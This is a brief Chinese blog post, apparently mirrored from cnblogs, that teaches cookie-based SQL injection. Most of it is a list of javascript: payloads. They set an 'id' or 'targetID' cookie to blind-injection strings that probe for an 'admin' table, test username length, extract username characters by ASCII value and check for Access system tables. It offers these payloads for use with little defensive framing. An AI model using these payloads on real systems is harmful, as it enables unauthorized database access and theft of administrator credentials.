zoukankan      html  css  js  c++  java
  • cookies注入

    前提是服务器读取cookies验证(有加密和数字签名的cookies很难修改了)

    一。通过盗取 和修改cookies文件

    二。通过命令行document.cookie

    javascript:alert(document.cookie="id="+escape("156 and 1=1"));
    javascript:alert(document.cookie="id="+escape("26 and (select count(*) from admin)>0"));
    //猜是否有admin表
    javascript:alert(document.cookie="id="+escape("26 and (select count(username) from admin)>0"));
    //猜是否有username表
    javascript:alert(document.cookie="id="+escape("40 and (select len(username) from admin)=5"));
    //看管理员密码是否是5位
    javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,1,1)) from admin)=97"));
    //第一位是否是ASC码97,相当于a
    javascript:alert(document.cookie="targetID="+escape("108 and (select top 1 unicode(substring(user,3,1)) from admin)=111"));
    javascript:alert(document.cookie="id="+escape("26 and (select top 1 asc(mid(username,2,1)) from admin)=97"));
    //第二位
    javascript:alert(document.cookie="targetID="+escape("108 and (select count(*) from msysobjects)>0"));
    //看系统表

  • 相关阅读:
    暑假团队学习第一周
    Python快速入门(3)
    Python快速入门(2)
    走入PHP-类与对象
    走入PHP-declare、ticks、encoding、include
    走入PHP-变量、运算符
    XAMPP安装报错及解决
    走入PHP-数据类型和字符串语法
    走入PHP-初次见面
    剑指offer-替换空格
  • 原文地址:https://www.cnblogs.com/cuihongyu3503319/p/1486693.html
Copyright © 2011-2022 走看看